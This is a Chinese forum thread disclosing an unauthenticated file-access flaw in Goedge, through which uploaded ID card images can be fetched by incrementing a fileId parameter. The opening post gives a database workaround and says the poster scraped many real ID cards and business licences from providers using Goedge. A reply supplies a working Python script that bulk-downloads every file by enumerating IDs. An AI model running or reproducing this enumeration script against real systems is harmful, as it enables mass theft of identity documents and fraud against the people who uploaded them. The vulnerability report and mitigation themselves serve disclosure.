积分交易
签到中心
做个任务
收藏本站
切换到宽版
论坛
BBS
娱乐
商店
家园
Space
登录
注册
抽卡
梭哈
宝可梦
彩色昵称
积分商店
道具商店
获取更多积分
奶昔论坛
»
论坛
›
交流
›
情报
›
Goedge静态文件路径未鉴权,泄露用户身份证件信息 ...
返回列表
发布新帖
查看:
1377
|
回复:
3
Goedge静态文件路径未鉴权,泄露用户身份证件信息
kunkun
kunkun
当前离线
积分
5034
雷达卡
发表于 2024-8-18 04:55:10
|
查看全部
|
阅读模式
立刻注册账号,享受更清爽的界面!
您需要
登录
才可以下载或查看,没有账号?
注册
×
经测试Goedge用户端上传的静态资源和实名认证时上传的身份证图片全部都在 /files/file 这个路由下
只要用户端地址+/files/file?fileId=1 就可以获取到上传的图片附件(主控端也一样)
虽然上传身份证时在数据库的 isPublic 字段确实是不公开的,但是goedge却没有判断这个字段,还是可以公开访问
目前只有一个临时解决方案,在数据库执行这个这个命令,把证件附件的状态改一下(改了后就访问不了,审核的时候也看不到),这个bug还需要goedge那边进行修复
UPDATE edgefiles SET state = 0 WHERE type = 'user.idcard';
复制代码
根据以上规则,写个脚本就可以批量拿到该系统上传的所有图片文件
方能和安捷自家用的都是Goedge,随便爬一下拿到不少身份证正反面和营业执照的图片
上传
,
这个
,
身份证
,
图片
,
Goedge
爱生活,爱奶昔~
回复
使用道具
举报
提升卡
置顶卡
变色卡
顶贴箭
摆烂咕咕
摆烂咕咕
当前离线
积分
5386
雷达卡
发表于 2024-8-18 08:24:53
|
查看全部
啊哈哈哈~来不拉力~
爱生活,爱奶昔~
回复
支持
反对
使用道具
举报
zezhiya
zezhiya
当前离线
积分
4104
雷达卡
发表于 2024-8-18 13:20:52
|
查看全部
import requests
import os
# 创建保存图片的文件夹
save_dir = 'downloaded_images'
if not os.path.exists(save_dir):
os.makedirs(save_dir)
# 循环下载图片
base_url = 'https://域名/files/file?fileId='
start_id = 1
end_id = 129
for file_id in range(start_id, end_id + 1):
url = f'{base_url}{file_id}'
response = requests.get(url)
if response.status_code == 200:
file_path = os.path.join(save_dir, f'image_{file_id}.jpg')
with open(file_path, 'wb') as f:
f.write(response.content)
print(f'Successfully downloaded {file_path}')
else:
print(f'Failed to download {url}')
print('All downloads completed.')
复制代码
爱生活,爱奶昔~
回复
支持
反对
使用道具
举报
Ranking5
Ranking5
当前离线
积分
187
雷达卡
发表于 2024-9-10 14:24:32
|
查看全部
Goedge的作者真的卖了吗?
爱生活,爱奶昔~
回复
支持
反对
使用道具
举报
返回列表
发布新帖
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
|
注册
本版积分规则
发表回复
回帖并转播
回帖后跳转到最后一页
浏览过的版块
银行
日常
推广
相关网站
9eSIM
Xesim
eSIM.GG
JSDMirror
MoeCloud
站内导航
统一账号
奶昔超市
数字证书
电报频道
电报群组
商业推广
商家申请规则
Apply for Provider
合作商家展示
关注公众号
添加微信客服
© 2025
Naixi Networks
沪ICP备13020230号-1
|
沪公网安备 31010702007642号
关灯
在本版发帖
扫一扫添加微信客服
返回顶部
快速回复
返回顶部
返回列表